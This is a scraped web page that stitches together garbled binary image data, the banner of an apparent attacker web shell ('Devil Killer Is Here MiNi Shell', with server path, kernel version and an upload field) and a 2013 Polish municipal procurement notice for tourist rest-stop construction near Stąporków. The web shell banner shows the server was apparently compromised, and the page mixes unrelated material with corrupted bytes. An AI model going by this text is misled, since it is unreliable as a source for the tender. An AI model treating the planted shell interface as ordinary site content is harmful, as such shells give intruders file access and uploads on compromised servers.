JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130219/69800-N-2013.html

<p class="kh_header"><b>Stąporków: Budowa towarzyszącej małej infrastruktury turystycznej - pięciu  miejsc odpoczynku przy rezerwatach przyrody oraz w  miejscowościach Czarna i Wielka Wieś</b><br>
<b>Numer ogłoszenia: 69800 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stąporków , ul. Piłsudskiego 132a, 26-220 Stąporków, woj. świętokrzyskie, tel. 041 3741122, faks 041 3741860.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.staporkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa towarzyszącej małej infrastruktury turystycznej - pięciu  miejsc odpoczynku przy rezerwatach przyrody oraz w  miejscowościach Czarna i Wielka Wieś.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia będzie realizowany w ramach  działania 413 - Wdrażanie lokalnych strategii rozwoju, w zakresie operacji opowiadających warunkom przyznania pomocy w ramach działania ODNOWA i ROZWÓJ WSI objętego na lata 2007 - 2013 o nazwie:
Oznakowanie odcinka o dł. 40 km PIEKIELNEGO SZLAKU wraz z zaprojektowaniem i budową towarzyszącej małej infrastruktury turystycznej - pięciu miejsc odpoczynku przy rezerwatach przyrody oraz w miejscowościach Czarna i Wielka Wieś.

Niniejsze postępowanie obejmuje realizację zadania pod nazwą:
Budowa towarzyszącej małej infrastruktury turystycznej - pięciu miejsc odpoczynku przy rezerwatach przyrody oraz w miejscowościach Czarna i Wielka Wieś i tak:

1. Budowa miejsca odpoczynku przy rezerwacie Górna Krasna msc. Krasna

Inwestycja będzie realizowana na niezabudowanej działce położonej w miejscowości Krasna na działce o numerze ewidencyjnym 119-5.
Roboty budowlane będą obejmowały montaż obiektów małej infrastruktury turystycznej stanowiących wyposażenie miejsca odpoczynku dla turystów w ramach Piekielnego Szlaku.
Przedmiotem zamówienia są następujące urządzenia:
- Zadaszenie - stół -  szt.1
- Ława bez oparcia - szt.2
- Tablica z informacją turystyczną - szt.1
- Kosz na śmieci -  szt.1
- Drogowskaz z napisem - 1 szt.
Zakres robót obejmuje posadowienie typowych betonowych fundamentów dla ww. urządzeń, wykonanie i montaż urządzeń oraz niwelację terenu wraz z jego obsianiem trawą.
Obiekty małej infrastruktury turystycznej należy wykonać zgodnie z projektem zagospodarowania działki, rysunkami poszczególnych elementów stanowiących rozwiązanie konstrukcyjne i ich wykonanie, i tak:
ZADASZENIE  - STÓŁ
Element pionowy - słup wykonany z belki o przekroju 18 x 18 cm; krawędzie słupa fazowane - po 1 cm na narożnikach. Drewno impregnowane środkiem odpornym na grzyby, owady i pleśnienie; zabezpieczone izolacją przeciwwilgociową (smoła lub lepik), wystawioną na 20 cm powyżej poziomu terenu. Wysokość słupa - 2,95 m powyżej p.t.
Dach na planie kwadratu, czterospadowy, pokryty gontem o gr.2,5 cm. Pokrycie dachu mocowane do łat o przekroju prostokątnym 6 x 4 cm. Łaty mocowane do krokwi o przekroju 10 x 8 cm. Krokwie podpierane przez zastrzały o przekroju 8 x 6 cm. mocowane do słupa na wysokości 2 m p.pt. Belki tworzące ramę zadaszenia i belki wspierające., mocowane do ramy za pomocą złącza cieśielskiego o przekroju 10 x 8 cm.
Konstrukcja blatu stołu - foszt o gr. 10 cm, szer. 25 cm i dł.100 cm, mocowane belkami wspornikowymi o przekroju 8 x 8 cm. Dwa foszty wewnętrzne wycięte w miejscu styku ze słupem. Do zadaszonego stołu dostawienie ławki bez oparcia.
Fundament:
Wykonany z betonu B-15. Słup drewniany z wydrążonym w stopie otworem o średnicy 25 mm i głębokości 20 cm osadzony na rurze stalowej o 25 mm zamocowanej w fundamencie za pomocą kleju konstrukcyjnego. Obejma stopy słupa z płaskowników blaszanych = 6 x 50 mm spawanych, łączona ze słupem za pomocą wkrętów. Słup podniesiony na 5 cm powyżej p.t. Powstała przez to szczelina wypełniona podsypką żwirową. Fundament o wymiarze 20 x 20 cm z otworem nawiercanym, zagłębiony na 110 cm poniżej p.t.

ŁAWA BEZ OPARCIA
Siedzisko wykonane z dwóch belek półokrąglaków o średnicy 24 - 28 cm, mocowane za pomocą gwoździ do dwóch belek podciosanych o śr. 30-35 cm, zabezpieczonych izolacją przeciwwilgociową ( smoła lub lepik).
Ławki ustawiać na podsypce żwirowo - cementowej.

TABLICA Z INFORMACJĄ TURYSTYCZNĄ
Elementy pionowe - słupy wykonane z belek o przekroju 12 x 12 cm; krawędzie słupa fazowane - po 1 cm na narożnikach. Drewno impregnowane środkiem odpornym na grzyby, owady i pleśnienie; zabezpieczenie izolacją przeciwwilgociową ( smoła lub lepi), wystawiona na 20 cm powyżej poziomu terenu. Wysokość słupa - 2,60 m powyżej p.t. Ozdobne zwieńczenia słupów mocowane w linii kalenicy do płaszczyzny dachu tablicy.
Dach tablicy czterospadowy o nachyleniu połaci 50 - 55 stopni, kryty gontem o grubości 2,5 cm, płatwi o śr. 8 -10 cm i dwóch belek o śr. 6 cm. Płatwie mocowane do belki pułapowej o przekroju prostokątnym 10 x 8 cm. Belki pułapowe wciosane w ozdobną belkę o przekroju 18 x 12 cm, stanowiąca zwieńczenie tablicy. Belka ta z grawerowanym napisem PIEKIELNY SZLAK i logo szlaku . Do beli i słupów mocowane ozdobne miecze o gr. 8 cm. (DETAL A na rysunku)
Konstrukcji do zamocowania tablicy informacyjnej wykonanej z blachy o wym. 120 x 70 cm  - cztery deski o gr.2,7 cm, mocowane do słupów za pomocą wkrętaków. Zwieńczenie tafli tablicy u dołu za pomocą belki stężającej o przekroju prostokątnym 12 x 12 cm.
Fundament:
Zagłębiony na 1,10 m poniżej p.t.. Rozwiązanie szczegółowe j.w  

KOSZ NA ŚMIECI
Elementy pionowe - słupy o przekroju 8 x 8 cm. Drewno impregnowane preparatem odpornym na grzyby, owady i pleśnienie; zabezpieczone izolacją przeciwwilgociową ( smoła lub lepik), wystawioną na 20 cm powyżej poziomu terenu.
Pokrycie dachu wykonane z desek o gr. 2,7 cm, opartych na czterech łatach i dwóch krokwiach o przekroju prostokątnym 5 x 3 cm. Krokwie opierają się na belkach o przekroju prostokątnym 10 x 5 cm, łączonych ze słupkami złączem ciesielskim na wpust. Krokwie i pokrycie dachu ułożone pod kątem 45 stopni.
Komora kosza z otwartymi drzwiami w kształcie prostopadłościanu wykonana z desek o gr. 2 cm i płaskowników stalowych o wym. 10 x 40 mm. Spód komory ażurowy - z czterech desek ułożonych w odstępach co 4 cm. Drzwi na zawiasach i zasuwie, mocowanej wewnątrz komory.
Logo szlaku - tabliczka drewniana grawerowana umieszczona w centralnej części drzwi kosza.
Fundament:
Zagłębiony na 50 cm poniżej p.t. Rozwiązanie szczegółowe - j.w.

DROGOWSKAZ
Wykonany z belek o przekroju 18 x 18 cm; krawędzie słupa fazowane - po 1 cm na narożnikach; reszta słupa - wycięta do przekroju 14 x 14 cm. Drewno impregnowane środkiem odpornym na grzyby, owady i pleśnienie; zabezpieczone izolacją przeciwwilgociową (smoła lub lepik), wystawioną na 20 cm powyżej poziomu terenu. Wysokość słupa - 2,30 m powyżej p.t. Słupy zwieńczone ozdobnym szczytem. Drogowskaz posiada kierunkowskazy wykonane z desek gr.2,7 cm, wpuszczanych.
Napis grawerowany na deskach z napisem : w jednym kierunku: Rezerwat GÓRNA KRASNA w drugim kierunku : PIEKIELNY SZLAK wraz z logo szlaku - tabliczka drewniana grawerowana umieszczona na wys. 1,90 m na słupie. Drogowskaz zwieńczony ozdobnym szczytem.
Fundament:
Zagłębiony na 110 cm poniżej p.t.. Rozwiązanie szczegółowe j.w.

2. Budowa miejsca odpoczynku przy rezerwacie przyrody Gagaty Sołtysowskie w msc. Odrowąż
  
Inwestycja będzie realizowana na działce położonej w miejscowości Odrowąż na działce o numerze ewidencyjnym 111-144.
Roboty budowlane będą obejmowały montaż obiektów małej infrastruktury turystycznej stanowiących wyposażenie miejsca odpoczynku dla turystów w ramach Piekielnego Szlaku.

Przedmiotem zamówienia są następujące urządzenia:
- Zadaszenie - stół -  szt.1
- Ława bez oparcia - szt.2
- Tablica z informacją turystyczną - szt.1
- Kosz na śmieci -  szt.1
Zakres robót obejmuje posadowienie typowych betonowych fundamentów dla ww. urządzeń, wykonanie i montaż urządzeń oraz niwelację terenu wraz z obsianiem terenu trawą.
Obiekty małej infrastruktury turystycznej należy wykonać zgodnie z projektem zagospodarowania działki, rysunkami poszczególnych elementów stanowiących rozwiązanie konstrukcyjne i ich wykonanie.
Elementy infrastruktury turystycznej należy wykonać wg opisu zawartego ww. rozdziale pkt.1.


3. Budowa miejsca odpoczynku przy rezerwacie Skałki Piekiełko w msc. Niekłań Wielki 

Inwestycja będzie realizowana na działce położonej w miejscowości Niekłań Wielki na działce o numerze ewidencyjnym 60-2415
Roboty budowlane będą obejmowały montaż obiektów małej infrastruktury turystycznej stanowiących wyposażenie miejsca odpoczynku dla turystów w ramach Piekielnego Szlaku.
Przedmiotem zamówienia są następujące urządzenia:
- Zadaszenie - stół -  szt.1
- Ława bez oparcia - szt.2
- Tablica z informacją turystyczną - szt.1
- Kosz na śmieci -  szt.1
Zakres robót obejmuje posadowienie typowych betonowych fundamentów dla ww. urządzeń, wykonanie i montaż urządzeń oraz niwelację terenu wraz z obsianiem terenu trawą.
Obiekty małej infrastruktury turystycznej należy wykonać zgodnie z projektem zagospodarowania działki, rysunkami poszczególnych elementów stanowiących rozwiązanie konstrukcyjne i ich wykonanie.
Elementy infrastruktury turystycznej należy wykonać wg opisu zawartego ww. rozdziale pkt.1.


4. Budowa miejsca odpoczynku w msc. Wielka Wieś.

Inwestycja będzie realizowana na działkach położonych w msc. Wielka Wieś o numerach ewidencyjnych 483-2 i 484.
Roboty budowlane będą obejmowały montaż obiektów małej infrastruktury turystycznej stanowiących wyposażenie miejsca odpoczynku dla turystów w ramach Piekielnego Szlaku.
Przedmiotem zamówienia są następujące urządzenia:
- Krąg ogniskowy kamienny (bez ław) - szt.1
- Ława bez oparcia - szt.10
- Tablica na mapę z informacją turystyczną - szt.1
- Kosz na śmieci - szt.2
- Budowa altany - szt.1  - wiaty wolnostojącej o konstrukcji drewnianej o pow. zabudowy 25,00 m2 wraz z utwardzeniem terenu pod altaną - wg opracowanego projektu.
Zakres robót obejmuje również posadowienie typowych betonowych fundamentów dla ww urządzeń, wykonanie i montaż urządzeń oraz niwelację terenu i jego obsianie trawą.
Obiekty małej infrastruktury turystycznej należy wykonać zgodnie z projektem zagospodarowania działki, rysunkami poszczególnych elementów stanowiących rozwiązanie konstrukcyjne i ich wykonanie.
Elementy infrastruktury turystycznej należy wykonać wg opisu zawartego ww. rozdziale pkt.1 (ława bez oparcia, tablica informacyjna, kosz na śmieci) zaś krąg ogniskowy (DETAL D) wykonać należy z kamienia - granitu w postaci dwóch pierścieni - wewnętrznego zagłębionego i zewnętrznego znajdującego się na poziomie + -0,00.

5. Budowa miejsca odpoczynku w msc. Czarna

Inwestycja będzie realizowana na działce zabudowanej położonej w msc. Czarna o numerze ewidencyjnym 587-2.
Roboty budowlane będą obejmowały montaż obiektów małej infrastruktury turystycznej stanowiących wyposażenie miejsca odpoczynku dla turystów w ramach Piekielnego Szlaku.
Przedmiotem zamówienia są następujące urządzenia:
- Krąg ogniskowy  kamienny ( bez ław) - szt.1
- Ława bez oparcia - szt. 5
- Tablica na mapę z informacją turystyczną - szt.1
- Budowa altany - szt.1  - wiaty wolnostojącej o konstrukcji drewnianej o pow. zabudowy 25,00 m2 wraz z utwardzeniem terenu pod altaną - wg opracowanego projektu.
Zakres robót obejmuje również posadowienie typowych betonowych fundamentów dla ww urządzeń, wykonanie i montaż urządzeń oraz niwelację terenu i jego obsianie trawą.
Obiekty małej infrastruktury turystycznej należy wykonać zgodnie z projektem zagospodarowania działki, rysunkami poszczególnych elementów stanowiących rozwiązanie konstrukcyjne i ich wykonanie.
Elementy infrastruktury turystycznej należy wykonać wg opisu zawartego ww. rozdziale pkt.1 (ława bez oparcia, tablica informacyjna, kosz na śmieci) zaś krąg ogniskowy (DETAL D) wykonać należy z kamienia - granitu w postaci dwóch pierścieni - wewnętrznego zagłębionego i zewnętrznego znajdującego się na poziomie + -0,00.
Zamówienie pn: Budowa towarzyszącej małej infrastruktury turystycznej - pięciu  miejsc odpoczynku przy rezerwatach przyrody oraz w  miejscowościach Czarna i Wielka Wieś  będzie realizowane na podstawie:
1. Przedmiaru robót stanowiącego materiał pomocniczy.
2. Specyfikacji technicznej wykonania i odbioru robót.
3. Opisu zagospodarowania terenu i załączników graficznych.

Uwagi:
- Każdy z Wykonawców winien odwiedzić miejsce budowy w celu sprawdzenia warunków placu budowy oraz warunków związanych z wykonaniem prac będących przedmiotem przetargu oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
- Koszty odwiedzenia miejsca budowy poniesie Wykonawca.
- Jeśli w SIWZ lub w załącznikach została wskazana nazwa producenta, znak towarowy, patent   lub pochodzenie w stosunku do określonych materiałów, urządzeń itp. Zamawiający wymaga, aby traktować takie wskazanie jako przykładowe i dopuszcza zastosowanie przy realizacji zamówienia materiałów, urządzeń równoważnych o parametrach nie gorszych niż wskazane w dokumentacji.
- Dopuszcza się rozwiązania równoważne opisywanym za pomocą norm, aprobat, specyfikacji technicznych lub systemów odniesienia o których mowa w art. 30 ust. 1-3 ustawy Pzp..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie warunków szczególnych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia
Wykonawca winien wskazać, że wykonał w okresie  ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy w tym okresie, najmniej jedną robotę budowlaną polegającą na budowie infrastruktury turystycznej służącej rekreacji o wartości nie mniejszej niż 50.000,00 zł. brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie warunków szczególnych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia
         Wykonawca winien wykazać, osoby które będą uczestniczyć w realizacji zamówienia:
         Za spełnienie tego warunku Zamawiający uzna wykazanie dysponowania osobami uprawnionymi do pełnienia samodzielnych funkcji technicznych w budownictwie: - co najmniej jedną osobę posiadającą uprawnienia w specjalności: - konstrukcyjno budowlanej; Każda wskazana osoba winna legitymować się uprawnieniami do kierowania robotami budowlanymi bez ograniczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie warunków szczególnych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
